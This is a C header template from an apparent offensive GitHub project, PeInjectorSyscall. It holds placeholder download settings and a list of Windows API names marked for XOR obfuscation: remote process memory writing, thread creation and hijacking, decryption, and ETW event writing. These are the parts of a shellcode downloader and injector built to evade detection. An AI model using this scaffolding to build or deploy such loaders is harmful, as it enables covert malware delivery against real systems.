PeInjectorSyscall/templateDef at master · maxDcb/PeInjectorSyscall · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
#pragma once

bool isHttps = <ISHTTPS>;
int port = <PORT>;

wchar_t wsKernel32DLL[]= L"KERNEL32.DLL";

// TO XOR
// add space at the end of string to give space to '\0'

char XorKey[] = "xorkey";

char sInjectionProcess[] = "<PROCESS>";
char sDomain[] = "<DOMAIN>";
char sUri[] = "<URL>";
char sTarget[] = "<TARGET>";

char sWinhttpDLL[] = "winhttp.dll ";

char sWinHttpOpen[]      = "WinHttpOpen ";
char sWinHttpConnect[]    = "WinHttpConnect ";
char sWinHttpOpenRequest[]         = "WinHttpOpenRequest ";
char sWinHttpSetOption[]         = "WinHttpSetOption ";
char sWinHttpSendRequest[]         = "WinHttpSendRequest ";
char sWinHttpReceiveResponse[]         = "WinHttpReceiveResponse ";
char sWinHttpQueryHeaders[]         = "WinHttpQueryHeaders ";
char sWinHttpQueryDataAvailable[]         = "WinHttpQueryDataAvailable ";
char sWinHttpReadData[]         = "WinHttpReadData ";
char sWinHttpCloseHandle[]         = "WinHttpCloseHandle ";
char sWinHttpAddRequestHeaders[]         = "WinHttpAddRequestHeaders ";

char sKernel32DLL[] = "kernel32.dll ";

char sGetProcAddress[]      = "GetProcAddress ";
char sGetModuleHandleA[]    = "GetModuleHandleA ";
char sOpenProcess[]         = "OpenProcess ";
char sVirtualAlloc[]        = "VirtualAlloc ";
char sVirtualFree[]         = "VirtualFree ";
char sVirtualAllocEx[]      = "VirtualAllocEx ";
char sWriteProcessMemory[]  = "WriteProcessMemory ";
char sCreateRemoteThread[]  = "CreateRemoteThread ";
char sLoadLibraryA[]        = "LoadLibraryA ";
char sCloseHandle[]         = "CloseHandle ";
char sWaitForSingleObject[] = "WaitForSingleObject ";

char sCryptAcquireContextW[] = "CryptAcquireContextW ";
char sCryptCreateHash[]      = "CryptCreateHash ";
char sCryptHashData[]        = "CryptHashData ";
char sCryptDeriveKey[]       = "CryptDeriveKey ";
char sCryptDecrypt[]         = "CryptDecrypt ";
char sCryptReleaseContext[]  = "CryptReleaseContext ";
char sCryptDestroyHash[]     = "CryptDestroyHash ";
char sCryptDestroyKey[]      = "CryptDestroyKey ";

char sCreateToolhelp32Snapshot[] = "CreateToolhelp32Snapshot ";
char sProcess32First[] = "Process32First ";
char sProcess32Next[]  = "Process32Next ";

char sOpenThread[] = "OpenThread ";
char sSuspendThread[] = "SuspendThread ";
char sResumeThread[] = "ResumeThread ";
char sGetThreadContext[] = "GetThreadContext ";
char sSetThreadContext[] = "SetThreadContext ";
char sThread32Next[] = "Thread32Next ";

char sCreateProcessA[] = "CreateProcessA ";
char sQueueUserAPC[] = "QueueUserAPC ";

char sNtdllDLL[] = "ntdll.dll ";
char sEtwEventWrite[] = "EtwEventWrite ";

char sUserAgent[] = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Edg/91.0.864.59 ";
char sAdditionalHeader[] = "OneTimeDownload: the the win ";

char sGetComputerName[] = "GetComputerNameA ";